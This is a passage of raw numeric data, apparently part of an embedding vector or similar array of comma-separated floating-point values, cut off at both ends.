96815,0.017678656,0.013853889,-0.020738622,-0.019966887,-0.017542452,0.028558731,-0.038621902,0.014843347,0.013835205,0.003770391,-0.0085138045,0.027766677,-0.012654458,0.00883301,-0.0015358878,-0.016006373,-0.005993331,0.010510711,-0.013808354,0.006733234,0.0083226655,-0.00992313,-0.031388402,-0.019798677,-0.010237929,-0.06413022,-0.023054987,0.025424829,0.027403135,-0.0016261622,0.0022432767,0.0010726968,-0.007835763,-0.009401022,0.010171586,-0.038613964,-0.0049404553,0.009462095,-0.021671329,0.023764035,0.015227423,-0.0070182723,-0.01101651,-0.019997392,0.013176438,0.0011875079,0.027948555,-0.019609375,-0.021040948,0.0142698055,-0.0056996,0.013425182,-0.020515531,0.014962858,0.012446852,0.012433142,-0.0065292823,-0.011978051,0.0024542983,-0.008503681,-0.025231967,0.009195663,0.02761911,0.032219894,0.0015274384,0.018840065,-0.010714207,0.0016414158,0.02266167,-0.01639006,-0.012974304,0.043911263,0.010125008,0.0003156173,0.016957235,0.00025550878,0.020511774,-0.0108074825,-0.010727436,-0.018348824,-0.005153164,0.034510724,0.008216377,0.02216819,0.0053734896,-0.0033721942,-0.012592855,0.0019163189,-0.008749769,0.027404271,0.020397892,-0.0040022153,0.013356431,0.012339314,-0.0045500873,-0.016151547,0.0050863503,-0.012234385,0.00476925,-0.023845917,0.02977389,-0.022322545,0.00004130831,-0.0531599,0.015733775,0.012137464,0.013861592,-0.004780614,-0.022224605,0.020123748,-0.006750223,-0.023500493,-0.027854977,-0.025749028,-0.003606681,0.034405425,-0.039063785,0.0020213714,0.00907014,-0.0042186086,-0.01045115,0.016433414,-0.009495219,-0.027761072,0.013138009,-0.024325034,0.02415616,0.011683859,0.020146204,0.0012101724,-0.0070819473,-0.010332379,-0.009495478,-0.005263246,-0.0046293586,-0.00054562115,0.00067659636,0.014512648,-0.0029689178,-0.03329804,-0.029072247,-0.008393481,0.0070612007,-0.033016555,-0.012510332,0.0069282185,0.008116986,-0.0013454921,0.014544399,-0.027932085,0.020650825,0.024127085,-0.023076301,0.0075223055,-0.005993431,0.004311234,0.02159073,0.038264025,-0.011119832,-0.037916634,-0.004787072,0.030020613,-0.011003429,0.01974653,-0.00637604,-0.033498693,-0.025544414,-0.03283526,0.0039133793,-0.016865864,0.012728339,0.017279722,-0.035897143,0.030671934,-0.015773658,0.0034646576,0.016692838,0.014276419,0.015813256,-0.013213623,0.00043895782,-0.01480076,0.002188218,0.007833368,-0.014446847,-0.018800944,-0.0059439754,-0.02008469,-0.018806424,-0.032272536,-0.0007380492,-0.009277864,-0.0012479915,0.0052168807,0.0022308985,-0.019526549,0.024062129,0.0006753205,0.03216012,-0.0256406,-0.021646142,0.002510023,-0.005969991,0.01819766,0.003646449,-0.016547676,0.040583726,-0.009044101,-0.016997421,0.017591706,0.0022697726,0.009511973,-0.0006596344,-0.008523306,-0.00487714,-0.01145396,0.022242922,-0.014405493,0.008329473,0.039986514,-0.009601829,-0.01251778,-0.006726896,-0.015555487,-0.01004563,-0.008632129,0.02017966,-0.0103001185,0.018975986,0.0023974322,-0.022848392,0.011722622,0.002270184,0.027019395,-0.012655073,0.0023585137,0.039299626,0.0060894424,-0.028427241,-0.008165634,-0.0042419927,0.0012940558,-0.0012073421,-0.0005316695,0.009055252,0.004767697,0.032245375,0.011266893,0.003794494,0.006949195,-0.005204424,0.010050966,-0.015513063,0.024253849,-0.009151872,0.0056178304,0.018411767,-0.013354844,-0.003425888,-0.017987996,0.0010187227,-0.000046201603,-0.046587948,0.007932862,-0.01710407,-0.002347263,0.018714296,-0.0033133524,-0.007923287,0.010304178,0.023535686,-0.00094449526,0.004943822,0.011867983,0.01351996,-0.0048861285,-0.017100599,0.015447732,-0.010826349,0.016949404,0.005846292,-0.014750326,0.005576042,-0.012119427,-0.013127007,0.0024747865,-0.017758142,0.01746592,0.03254866,0.010333276,-0.0008791366,-0.006292753,-0.026073003,-0.0041452884,-0.0067530824,-0.0029223438,-0.00094063586,0.027773328,0.011375906,-0.02021513,-0.02463404,-0.011532087,-0.057764795,0.0348443,-0.014462734,-0.0047658677,-0.0068940017,0.0065352404,-0.005513159,0.009984383,0.022949392,-0.013281615,-0.0012519495,-0.0023098784,0.008324298,0.0066953613,-0.0040140264,0.0006727586,-0.016097916,0.019672383,0.021645784,-0.00020823254,0.026259793,-0.008004773,0.01964998,-0.021931589,0.029331729,0.02163147,-0.006135451,-0.01090521,-0.032533564,0.029878637,0.0037940661,0.020606162,0.0018970772,-0.018127844,-0.016008567,-0.021904768,-0.0028793348,0.01583145,-0.019452363,0.00526888,-0.018296158,-0.014139058,-0.007901618,0.027863653,-0.02458084,-0.025266469,-0.005768771,-0.0145750735,0.00077747065,-0.008115603,0.037716504,0.0069400272,-0.0049952515,0.008779648,0.012081579,0.021957185,0.004306949,0.013446169,0.011170397,-0.010565398,0.0005532085,-0.0081004705,0.0047777914,0.006649726,-0.027270298,-0.0039606323,-0.0062073967,0.027412679,0.0014306683,0.00080920605,-0.013608159,-0.024380894,-0.024487779,0.016652742,-0.038854696,0.02396643,-0.028106047,-0.019615775,-0.0075862473,-0.038797002,-0.0016657688,-0.0023174512,-0.02861118,-0.0032022386,-0.016694902,-0.017031858,0.012298665,0.0034008557,0.0031413238,-0.013737088,-0.011342445,0.0048323837,0.009403402,-0.0002597601,0.0026174323,0.023162147,0.011942326,-0.014188166,0.0017664734,0.0069159362,0.018440906,-0.005285536,-0.0044733696,0.036568977,-0.00821277,0.00080499385,0.015144078,0.016347611,0.0025385283,0.021571778,-0.006060763,0.019702667,-0.01137147,0.012448707,0.013674766,0.003990525,-0.00058348663,0.007416312,0.029885285,0.02543396,-0.0018093026,-0.01132022,0.020690558,0.007881782,0.0043417783,0.017139532,0.019323565,0.013800935,-0.02579776,0.005698606,-0.006108192,0.045605503,0.023974022,-0.007281039,0.020199068,0.01608182,0.015556473,-0.020076541,-0.003994381,-0.0037579262,-0.011934418,0.0024475218,-0.011155043,0.0034618997,0.016259402,-0.010253398,0.008936965,0.023174932,-0.0026125677,0.01427264,0.0041031665,-0.0061850776,-0.0015721186,0.009737822,-0.013621236,-0.0069146515,-0.011038115,-0.010488781,0.020025935,0.010363434,-0.032268044,-0.019900039,0.00450847,0.014553531,-0.014829232,-0.0006876694,-0.0016001881,0.011499192,-0.02309189,0.0024674002,-0.016377939,0.012642204,-0.013587741,0.028422005,0.0012154497,0.0010381968,0.027754022,0.021497661,0.00048955576,-0.001918278,-0.002058626,0.027286965,0.008737328,-0.011437565,-0.006480863,0.0004118592,-0.004552179,-0.020736864,0.0018759179,-0.010058183,-0.008121052,-0.0010660931,-0.0050682775,0.0044292347,-0.023360353,0.0322118,-0.023096576,0.023827761,0.0039753322,0.00021682914,0.0034735007,0.012837795,0.0070080142,0.020915609,-0.010060348,-0.009406423,0.007141149,-0.022015607,-0.008010041,0.0040355017,-0.009505208,-0.0007477429,-0.0032208818,-0.03337446,-0.008493635,0.0066828644,0.009556768,0.0071457457,0.024569858,-0.03184505,0.026037341,0.02724271,0.010815258,0.024699017,0.0028813442,-0.013462666,0.044106893,0.010335061,-0.0033377265,-0.011757723,0.014655724,0.0008352135,0.017859379,0.034134407,-0.018837066,-0.007760362,-0.02188834,0.019733341,-0.0010672192,-0.007227011,0.011927081,0.022171434,0.012382775,-0.0049002166,-0.020906873,0.021480631,-0.008632115,0.0024559426,0.006803815,0.026789831,0.0021988926,-0.011062151,0.015593369,-0.016281636,-0.02588276,0.000106677195,-0.006117154,-0.012128482,0.012941884,-0.015209025,0.0057119336,0.005828733,-0.028488558,-0.0037116366,-0.015657825,0.024065988,0.001438406,0.018893972,0.0061462517,0.00885164,-0.0010842152,-0.0013499296,-0.021047123,0.0055028396,-0.014849718,0.015679443,-0.0070601753,-0.015077037,0.025475396,0.0060144756,0.01279669,-0.0051022368,0.004925104,-0.03762501,0.0117752245,0.028966522,-0.013848804,-0.013268907,0.010422185,-0.0062030037,-0.015524104,-0.023585688,0.005768841,0.01103404,0.011308088,-0.005657749,-0.013048768,-0.00495681,-0.006878516,-0.029612962,0.07797574,0.011619567,0.018726405,0.0027697014,0.020210985,-0.0131156305,0.015025966,-0.0016740118,0.0063772975,-0.022223286,-0.038166013,-0.021592695,0.0031007018,-0.0035950716,0.014993353,0.0053309035,-0.00097316375,0.008561365,0.004636196,0.020752711,-0.00074953993,-0.010791084,-0.009717032,-0.001925028,-0.0024626397,0.0025409397,0.021106154,-0.011216724,0.008119504,-0.02076912,-0.00096107187,-0.019402841,0.025199639,0.012012222,-0.0045811916,0.008819963,-0.0059670047,-0.0027116626,-0.012622939,-0.002835711,0.010591662,-0.025750427,0.035114218,-0.00328464,-0.0044779517,-0.0042359177,-0.012764831,-0.022106064,0.018103713,-0.029942825,0.00040177285,0.0104335155,-0.00914983,0.004654377,-0.008186675,0.00070698146,0.006668503,-0.00047102247,0.015443817,-0.018902587,0.0063051954,-0.016639309,-0.0040656724,0.0003329041,-0.019378643,-0.017002616,0.010284876,-0.022449631,0.0056428923,-0.015317153,0.022906544,0.00045018137,-0.007132889,-0.0014531366,0.012321733,-0.0044589224,0.017800272,0.0024849651,-0.0065162852,-0.0072807884,-0.0016731892,-0.0108544305,0.03220579,-0.009819191,-0.026908075,0.016358359,-0.0031687259,-0.015948167,0.06309115,0.0051073316,0.002160061,0.004540696,0.013168386,0.021151662,0.013319945,0.02061614,0.01512411,0.010836721,-0.009804239,0.022923822,-0.01015104,0.003996459,0.037415843,-0.0011070261,0.029383747,-0.0013928656,-0.0009323519,-0.007271018,0.00071642274,0.017693315,0.02985068,0.014674392,-0.00240066,0.017445162,-0.01074133,0.0044780485,0.017808344,-0.00026358935,-0.008058264,0.00053340377,0.017567145,0.013718086,-0.008949965,-0.062047087,0.01545432,0.1324083,0.0028187577,-0.005495998,0.022891799,0.0007695926,0.010484417,-0.10695206,0.023485163,0.0116995275,-0.0027109387,0.010740828,-0.013374419,-0.016207919,0.013629895,0.0035517307,-0.00992318,-0.016455213,-0.0051708156,0.018458087,-0.012371811,-0.017280163,0.013011051,-0.029798856,-0.009898008,-0.04057072,-0.0006109706,0.009293897,-0.0021752059,-0.01236799,-0.03582006,-0.0075319097,-0.020248834,0.017165229,0.00600535,-0.036079887,0.0040236507,0.01525531,0.01699035,-0.010769396,0.007670303,0.024623638,0.014689366,-0.0068986467,-0.04461122,-0.15288575,0.018962393,-0.010588191,-0.034872014,0.02817755,-0.01446117,-0.0071905633,-0.002986529,0.01927261,-0.026892288,-0.0125800595,0.02151066,-0.0075018224,0.017662609,-0.00634838,0.012163024,0.021030676,0.0017340404,-0.0021688403,0.010481818,0.012843591,0.0062079243,0.0003023566,-0.038659997,-0.028504541,-0.0044589196,0.0019025427,0.026244618,-0.026496124,0.009409843,-0.013467711,0.01482445,-0.018369474,-0.003324763,0.0012423039,-0.012496989,-0.013174803,0.015136757,0.010806647,0.02869293,-0.0035713397,-0.0006934298,0.001464722,-0.013670604,-0.0024107574,0.0022523159,0.0018334854,0.007427101,0.017039644,0.007904756,0.017394818,0.004699179,-0.0026877439,0.000520966,0.015088442,0.01546993,0.006841158,-0.017844155,-0.02714455,0.00015159503,-0.019102938,-0.024580758,-0.0026392958,-0.005237038,0.03978239,-0.014238479,0.026060563,-0.012308798,-0.009645745,0.010114316,0.0049422914,0.008070208,-0.009487504,-0.015922775,0.0039363345,0.012026563,-0.011343286,-0.0011662239,0.014879114,-0.007778084,-0.006873194,-0.01471594,0.00265134,-0.004839594,0.0069227414,-0.004586496,0.005830567,0.022654533,0.0020380525,-0.0130100185,0.021438748,-0.015704632,0.023337824,-0.0008874284,0.020351382,-0.004080369,0.045954987,-0.018189562,-0.018617947,0.02241516,-0.00068787753,-0.014822756,-0.030903129,-0.0017046657,0.001186645,0.0026936713,-0.0058434727,-0.018587237,-0.026434436,-0.012555666,-0.018166749,-0.009398404,0.028833762,0.0037547369,-0.008903336,-0.02445823,0.016514622,-0.019578982,0.010842332,0.004104814,-0.024940677,-0.0031358923,-0.002983468,0.034295697,0.036402117,0.036273234,-0.0146830715,-0.01387913,-0.01650888,0.017947676,-0.02521562,0.011207495,-0.018891467,0.0092910165,-0.01533308,0.008541395,-0.020843586,0.0012809358,-0.030991353,0.0056931386,-0.0013884688,0.005932478,-0.006996158,0.008367485,0.0029827314,-0.013823996,0.054656386,-0.009579252,0.020825794,-0.016625477,0.0009219454,0.011518245,-0.023765985,-0.023174964,0.019042673,0.067327365,-0.013552706,-0.02964102,0.003776339,0.013729127,0.029478481,0.016437676,-0.020849738,-0.00067363615,0.008976965,-0.017638803,-0.012557086,-0.006675018,0.003112774,-0.03509244,0.015539598,0.0014852637,0.021265069,0.006347997,-0.006868528,0.011741861,-0.006522774,-0.0070520393,0.013531485,0.0035801136,0.024495179,-0.00063038495,0.016215526,0.010083233,-0.006227307,-0.00016666489,-0.018379083,0.018322475,-0.003953828,0.019069837,-0.03356024,0.0028947818,-0.0061444757,0.0039061955,-0.0067951684,0.0014385537,0.024847787,0.00007981081,-0.014579642,-0.019062184,-0.0122699635,-0.033173125,-0.005045676,0.010779862,0.017303102,0.010016751,0.0143271005,0.006237726,-0.0072306846,-0.0053207716,-0.0061198603,0.0009957947,-0.02238081,0.0034574973,-0.005286442,0.026945755,-0.009348042,-0.017738963,-0.0013463858,-0.0070902263,0.006306661,-0.0035265505,-0.010230481,-0.006732544,0.0052216975,-0.006775106,0.007403434,-0.009636191,0.0032334235,-0.012730582,0.004024196,0.00598018,0.012589837,-0.0168422,0.009672742,0.010931779,0.02496943,0.016828686,-0.007506845,-0.029299889,-0.04433425,-0.007825654,0.03653037,-0.025690377,0.015354578,-0.0060522626,-0.0020038474,0.016159976,0.0038408095,0.022514416,0.01434809,0.021805983,0.010333486,0.030629583,0.00010978289,0.018772133,0.00522727,0.027214885,-0.026522439,-0.009917677,-0.026178619,0.015929589,-0.02496123,0.007835762,-0.008509222,-0.0014601338,-0.01995709,0.014340226,-0.01896971,-0.025539452,0.03178663,-0.004221802,-0.0146212345,0.016113276,-0.004843823,-0.0051732706,0.016851336,0.014551673,-0.011047799,0.025663871,-0.0149424635,0.015924972,0.008170648,-0.025253564,0.032027546,0.017902724,0.036198005,0.009914884,-0.0008059549,-0.015372298,-0.001370174,0.0009677659,0.018339938,-0.017752027,0.028612789,-0.03875303,-0.0037816577,0.010509258,-0.00008578372,-0.015116349,0.009421707,-0.0096100895,0.0008457833,-0.02625996,-0.00046698615,-0.027321372,0.017291438,0.0077997856,0.006951528,-0.0019094591,0.002783824,-0.019669306,-0.009621124,-0.012350409,0.01428036,-0.000822067,0.019125672,0.003902342,0.0023241541,-0.00059676456,0.024382647,0.037753254,-0.0036944703,0.029234037,0.002517685,0.002340222,-0.020164479,0.006880424,-0.00664909,-0.014816737,-0.0024165423,0.0011131386,0.019576203,-0.0047521857,-0.028174654,0.009132149,0.0109961,0.0055907047,-0.037882116,-0.017004723,0.0078109973,-0.016118893,0.019802438,-0.01100155,-0.0028026938,-0.015538676,0.0011312466,-0.0017568199,-0.023698002,-0.0009990424,-0.008771427,0.016767751,-0.013909432,0.011983001,0.029431578,-0.000053408574,0.036198866,-0.018611968,-0.033211976,-0.004507695,-0.010497999,0.013977341,0.0020619633,-0.0038877588,0.0054538674,-0.00020504095,0.005726202,-0.019897709,0.0073347148,-0.019886132,-0.024067072,-0.00004962475,0.01590465,0.0031289153,-0.019358875,0.005462038,-0.011043386,-0.0009403878,-0.0050852126,0.004312046,-0.008210731,-0.011742526,0.056977555,-0.009812158,-0.011202368,-0.00069118117,0.01811779,0.019398525,-0.020068564,0.019150864,-0.0036907883,-0.008126813,-0.027454698,-0.034880724,0.0094162,0.0140133565,-0.013464337,-0.019535376,-0.008739857,-0.007791162,-0.012654944,-0.010713966,0.018194577,0.0030587786,0.0330147,0.010537233,-0.014696525,-0.04417288,0.004718844,0.015005172,-0.012632035,0.00022802844,0.016819697,-0.0037974622,-0.018028727,-0.0023556706,-0.022500562,-0.008816593,0.0013380118,0.022309417,0.01068429,0.005215622,0.030591628,0.001283427,-0.0005426311,0.0135831935,0.007505174,0.002910402,0.006857633,0.00024167568,-0.0010017582,0.0012449847,0.012384593,0.012689479,0.015488363,0.012904505,-0.020235816,0.027494233,0.004259879,-0.004062539,-0.0068140742,0.0008715725,0.014696795,-0.012585958,-0.018286873,-0.008601801,0.0021524609,0.014654772,-0.017569933,-0.0017854014,0.0026928212,-0.0009670149,-0.02004584,0.009477629,-0.003421896,0.013474749,-0.0112263495,0.002969641,0.013606786,0.0066543208,0.020874873,0.011392822,-0.011629956,-0.0013282271,-0.0063099544,-0.018930139,0.004965734,0.014305759,0.014610589,0.008471403,0.007969076,0.02305913,0.046250973,-0.007606735,0.009300152,0.0062040547,-0.010626844,0.011371094,0.0062689357,-0.012691412,0.015186811,-0.021408582,-0.020971969,0.009194363,-0.013361274,-0.010038864,-0.021388354,0.011246061,-0.07971988,0.009869206,-0.013694496,-0.016461931,0.006003915,-0.020770393,0.0055066883,0.03019979,-0.009276172,-0.042330123,-0.005726841,0.024182526,0.0049817003,0.0016257229,-0.0011575522,-0.007846169,-0.011631158,-0.0016696492,0.020883122,0.0035395874,0.0031107578,-0.0051667867,-0.0007224353,-0.015668469,0.006669183,0.0027798477,0.012114276,0.018618092,-0.007731511,-0.0007208388,-0.0041290773,-0.0020312597,-0.0015770949,0.02297967,-0.010755094,0.008328501,-0.0019120855,0.0005362381,0.013428041,0.0118675735,0.002804758,-0.009526082,0.01079787,0.0128776,0.02925366,0.010763148,-0.0021903599,0.0064529236,0.019195383,0.031881098,-0.02750008,-0.017401911,0.011926036,-0.010693027,-0.004348768,-0.026991162,0.010813326,-0.00297158,0.0028182247,0.010561721,-0.020550309,-0.0076034483,0.0014371094,-0.01919476,-0.0034978294,-0.009346878,-0.004387349,-0.01840067,-0.028217137,-0.0058504953,-0.031707924,0.01857955,0.007429853,0.001078381,0.003560301,0.014215472,0.0069334307,-0.00737398,-0.014196524,0.0063132783,-0.03476876,-0.003540643,0.0071163275,0.0038154947,-0.0066221105,-0.018280018,0.011118704,0.0014038718,-0.0028262837,0.006193,0.01575933,0.0015261823,-0.009656334,-0.010123757,-0.014390676,0.0049582864,-0.015151972,0.021181306,-0.008232781,-0.005927721,-0.0059514055,-0.013711817,-0.014161279,-0.015657429,-0.09558695,-0.021769917,0.012641114,-0.015518427,-0.0055883117,-0.00399432,0.021482497,0.009531553,0.03178918,0.028360609,-0.027872637,-0.009450132,-0.026423926,0.0010300318,-0.0072526764,0.0040037893,-0.024405412,-0.008686637,0.013999071,0.016326198,0.00026685174,-0.004820698,-0.009715272,0.0071861665,0.0075727273,0.010986073,-0.01041783,0.032232396,0.043710403,-0.0222814,0.0015430065,-0.0019135019,-0.016914673,0.010188869,-0.03320284,0.013442085,0.009365378,-0.0023442213,0.010587392,0.012649092,0.014866767,0.00918369,0.0069905138,0.0027903705,-0.010594887,0.006939331,-0.0202861,0.022143899,-0.01915078,0.029312192,0.009513591,-0.010365091,-0.019213472,-0.01807744,-0.02241164,-0.020091632,-0.0088620735,0.011243252,-0.0009914719,0.012972528,-0.014708513,-0.01575361,-0.024035856,0.0078966245,-0.018529128,0.006605222,0.0010714795,0.015273555,0.016564695,0.018637737,-0.0015191335,0.015872678,0.003567132,-0.032214783,0.037726045,0.01213229,0.013341498,0.016230993,-0.011228948,0.011282131,-0.014258033,-0.038364977,-0.005094504,-0.0018538758,-0.039191734,0.014375293,0.001808073,0.012372731,-0.011138748,-0.0017826965,0.009962631,0.018000634,-0.023097996,0.039662242,0.025090814,0.0328874,0.035222337,-0.021539444,-0.0015878434,-0.004711783,-0.000997772,0.0018759702,0.0010022393,-0.0059500784,-0.021863203,0.011672322,0.019675111,-0.030827893,0.011943007,-0.010960022,0.020128885,0.028000554,-0.020891637,-0.0025411886,0.019104823,0.023365969,0.00004205144,0.0019349708,-0.0023561935,-0.020865545,0.0075194165,0.0048777624,-0.0038053037,-0.008386335,-0.0033586216,-0.010633417,-0.014578159,0.021530516,-0.004320013,-0.00768656,-0.009402614,0.0069009536,0.021794477,-0.0046612485,0.009042564,0.0031391208,-0.023280418,0.016229242,-0.0066007017,0.001816873,0.004588048,-0.0026444043,0.0093505215,-0.009145219,0.0015333391,-0.00032294143,-0.010718367,-0.0146366,-0.013219009,0.030204816,0.009029295,-0.013075675,0.01892324,0.009841611,-0.007125495,0.0007223419,-0.008125644,0.008280272,-0.008768884,0.013630932,-0.018617947,0.014447563,0.0170435,0.008092302,-0.00027803855,-0.016626053,-0.0208633,-0.00017317238,-0.002288367,0.012073325,-0.0151769575,-0.0072330995,0.0137117645,-0.063290775,0.006759578,0.019644188,0.017878462,0.016013594,0.033783298,0.033308048,-0.010005276,-0.0079160975,-0.02432117,0.00499767,0.0116497055,0.019836945,-0.0004585747,-0.012947537,-0.024731295,0.0068061147,0.039369646,0.023336127,-0.0021954179,-0.022344965,0.004563391,-0.018625578,-0.002317687,-0.01304192,-0.00079456065,-0.0042724,-0.0148381125,0.020435479,-0.004660964,-0.032207064,0.015782325,-0.01795923,0.0031336716,0.031762235,0.012297786,0.000786992,-0.0049395706,0.029512653,-0.024848992,-0.013299752,0.011748487,0.03402827,-0.013137895,-0.017836615,0.0281729,0.0027090528,-0.01969563,-0.0021923122,0.019243877,-0.001346593,-0.008701722,0.03549802,0.009535422,0.035107527,-0.02913153,-0.01669537,0.0071051572,0.009762518,-0.0075712604,0.009471858,0.0043879035,0.0022822968,0.024571,-0.002337987,-0.00665841,0.016025351,0.023690011,0.014958929,0.02970492,0.016688809,0.02892546,-0.00073151925,-0.0028366484,-0.000060390783,0.04448331,0.024000484,0.0154793635,-0.016565807,0.0009130085,0.008351057,0.019555703,-0.004344828,-0.0017446739,-0.0071168602,-0.027971212,0.0029838388,-0.023397949,-0.0051041967,-0.042204067,-0.0036902179,0.014235965,-0.004983037,0.010673414,-0.012867105,-0.011333604,0.0056534614,0.00696394,0.0133421095,0.013844201,0.006215459,-0.008078975,-0.013759483,0.021718128,-0.00859713,-0.004954351,0.009869549,-0.008849615,-0.0073554227,-0.018198002,0.0028328435,-0.0038580992,0.022185152,-0.0025911957,0.015903048,0.012127035,-0.00910936,-0.012558557,-0.006491478,0.0003160715,-0.013800602,0.00050089933,0.019776436,0.008307515,-0.020015607,-0.00012533527,0.012560333,0.020690668,-0.007657564,-0.023875883,-0.0029878726,0.012070078,-0.009667863,-0.010870553,0.00989746,-0.009881666,-0.008895975,0.001728843,0.012978539,-0.010626214,0.021292262,-0.0031430803,0.008500393,0.00211677,-0.00008705711,-0.030416282,-0.008380791,-0.003090837,-0.0061782883,0.017445978,-0.006904772,0.0081011765,-0.007297869,0.0095475195,0.030447848,-0.024362342,-0.020197688,0.015493482,0.027670657,-0.021748807,-0.031960577,0.007863685,-0.011614416,0.0065161167,0.031356692,-0.020711536,0.0077602076,-0.022798296,0.004451341,0.0061530005,-0.022217311,0.019378288,0.013648486,-0.00045985752,0.009921938,-0.0019812551,0.00346188,0.008343746,0.009809723,0.0014072803,-0.017573867,-0.022944365,0.030809192,-0.034882337,-0.013327842,0.005210561,0.01992222,-0.027104195,0.015038328,-0.018352969,0.0032040584,0.003267136,-0.00690408,-0.019599246,0.0055292267,-0.026920373,0.0123654995,0.0032630002,0.017057132,-0.017400084,-0.027348865,-0.005693643,-0.08086976,0.007246382,0.015097523,0.00070277264,0.05170065,-0.0076113613,-0.005876055,-0.0057046786,-0.004569594,0.020462938,-0.006254975,-0.015536814,0.0007235437,0.00957217,0.031382505,-0.017661655,-0.01288773,0.010952341,0.013210852,-0.0224724,-0.0028071452,-0.012833027,-0.011546299,-0.011838924,0.016578548,0.01881288,-0.0060085985,-0.008925342,-0.0038148605,-0.0028661578,0.0021988202,0.0030097365,-0.010549797,0.007273746,-0.010431309,0.012261995,-0.0105563365,0.009851367,-0.0033316468,-0.03735055,0.012904134,0.0028921394,0.0033761745,0.00073199236,-0.02538351,0.02159562,-0.014031133,-0.0058043757,-0.008798473,-0.009871556,0.0071125785,0.013406211,0.006228242,0.022821318,0.018157765,0.0034970841,0.006396078,0.0011587716,0.027522352,0.003641462,0.00430363,0.014995537,0.0005041096,0.0068138796,0.00701019,0.0038710816,-0.0010919003,0.0054833014,-0.0054037916,0.014321461,0.015811583,-0.026196312,-0.0045249555,-0.013506403,0.00063032383,0.011858065,0.0035361901,-0.0034326022,-0.024072653,-0.011667034,0.038612835,-0.008837535,0.025645046,-0.0006324633,-0.0061917184,0.0059411256,-0.0012213247,0.012699851,-0.0024472934,-0.013871031,0.005341353,0.0074402634,0.026544446,-0.013937595,0.019640096,-0.0038995764,-0.011669488,0.004691834,-0.023167016,0.0048803203,-0.0069215917,0.008442383,0.00046243734,-0.019555302,-0.016055038,-0.022661721,-0.017362189,-0.01664942,-0.01627575,-0.01685605,-0.02024689,0.03739807,0.032015342,0.034581628,0.020889701,0.023691222,-0.016621135,0.01702067,-0.023185315,-0.02461673,-0.018996222,0.0014077938,-0.015369135,0.021653831,0.013711416,-0.012197318,0.008146773,0.009346807,-0.021062687,0.024940802,0.0110456785,0.01806099,0.00639025,0.017117346,-0.01654357,0.02050226,-0.0079032825,0.020632936,0.010548124,0.009640523,0.01922403,-0.0058834804,0.010911751,-0.01218251,-0.019662809,0.012202849,0.0094853565,0.0056528104,0.020270647,-0.014301628,-0.02842872,0.0129846465,-0.017324386,0.0046618776,-0.011857784,0.019809324,0.0039382474,0.008350089,-0.0007302364,-0.027718607,-0.0025034198,0.021133669,-0.0015081981,-0.009484084,-0.0127426535,0.011628041,-0.00234547,-0.0040699393,-0.012453425,0.008756882,-0.024267562,-0.014780843,0.013775289,-0.01654632,-0.0067421426,-0.0009064712,0.021657575,0.023523176,-0.0047282297,0.0015846363,-0.04301295,-0.010609302,-0.0007801878,-0.01627988,0.0013603696,-0.02168768,0.003902462,0.009595261,0.02389775,-0.007168368,0.011099175,-0.011452149,-0.007630312,-0.009156565,0.0044453335,-0.015447751,0.0010666273,-0.0099107,-0.015252446,0.008651953,0.0021186064,0.023136828,-0.0002084847,0.014789059,0.034636565,0.004523827,-0.018014638,0.021056026,-0.018411862,-0.0021424838,-0.003921763,0.009444301,0.02862954,0.123214625,0.006644569,0.00062703213,-0.0040475666,0.01758666,0.010721427,-0.0066536707,-0.00030476242,0.0010898495,0.008009722,0.034659363,-0.015910238,0.014123826,-0.008807615,-0.002724878,0.022738224,0.004919842,-0.034016587,0.01911758,0.015578024,0.015763098,-0.013941542,-0.0051548714,-0.025349552,-0.00846185,-0.06700463,0.019861614,0.024802137,-0.00024541118,0.028484302,-0.0025054887,0.00069374917,0.036886226,0.00859126,0.0010029478,0.0063553858,0.00063988386,-0.02450382,0.0047583403,-0.017710606,0.031456854,0.012170223,0.011466878,-0.0059567806,-0.011446357,0.0016962773,-0.0070357975,-0.0053368486,0.011356765,-0.00617063,-0.0112217935,-0.00061000837,0.007940561,-0.0014305647,0.016339025,-0.0026993053,-0.0047171847,-0.008465244,-0.000090204754,-0.005141116,0.013942157,0.0013373961,0.007113453,-0.014189608,0.0119171655,-0.023720331,0.016665658,0.0036970514,-0.008387439,0.00545387,0.03204406,0.0053390115,0.0008910735,0.0036119393,-0.0044276724,0.012998385,-0.012091339,-0.0025280023,-0.002555461,-0.003362684,0.010941307,-0.0075179245,0.0051749647,0.013821255,0.0035838762,0.009225442,-0.016746894,0.02226528,0.003806656,-0.007923964,-0.022199355,0.00025623548,0.01997167,0.030989356,-0.013826591,0.0042385464,0.02082706,-0.023727093,-0.008525648,0.00804326,-0.01764882,-0.019196045,-0.005333196,0.008988655,0.0074535296,-0.020642107,-0.000381234,0.018214278,-0.00650655,-0.0028223165,-0.0048880787,0.013346408,-0.01079391,-0.004117232,0.016136596,0.035361696,-0.024335332,-0.0076962193,0.024511008,-0.012528169,-0.0044097127,0.027953835,0.009526768,0.043371454,0.012485459,-0.0028608495,-0.03448339,0.0031117504,-0.011812168,0.0026164176,-0.00019497225,-0.03482659,0.011346361,0.03433105,0.004152065,0.018459383,0.030790001,-0.011707711,-0.00030709433,-0.018102646,0.020209355,-0.007627899,0.0020566166,0.013031698,0.019952603,-0.011934147,0.011041601,0.012378772,0.0046410477,0.0015529792,0.0128427055,0.019906422,-0.010235792,-0.018533424,-0.011879759,-0.0064060963,-0.015115435,-0.0068683294,-0.015156497,-0.009423321,0.0070696333,-0.007985606,0.021101028,-0.02953739,0.022750897,0.020860687,0.0013017295,0.020734258,-0.001082967,0.006956486,-0.024391148,-0.0007617013,0.0058377148,-0.005204388,-0.017447459,0.0011789385,-0.00068383856,0.00844919,0.00018509667,0.010613053,-0.00044520467,0.006670223,-0.014989959,-0.0028892912,0.013728919,-0.00021083794,0.018751314,0.010779921,-0.027866941,0.0070698047,-0.008599879,0.0107299825,-0.0035707837,0.013106852,-0.010179442,0.0064888685,-0.0077201826,0.03420592,-0.026424475,-0.023590986,-0.008088705,-0.010498305,0.0069754636,-0.013865309,-0.0011123596,-0.0061451104,0.0025956924,0.015410758,0.0068620527,-0.020704586,0.023920232,-0.004886436,0.0025627222,-0.027426092,-0.0056714686,-0.0003157298,-0.011046334,-0.026817868,-0.01986786,-0.016811471,0.010705648,-0.0019075845,-0.008439561,0.014618811,-0.011918468,-0.018990442,-0.020659024,0.0032143206,0.016529057,-0.027605902,0.0019983547,0.0060953684,-0.0018181573,-0.0040473356,-0.0049367463,-0.015717236,0.008167991,0.0058278074,0.011004053,0.015327284,-0.008558168,0.0040606824,0.0008538936,0.012763939,-0.005391882,0.01183022,-0.0116109215,-0.0032166557,0.008446034,-0.0069341226,-0.039794553,0.0075547695,-0.023411212,-0.02655418,-0.024582466,-0.025006397,0.0057418155,0.022857474,0.03460188,-0.017226363,0.01403436,0.018899307,-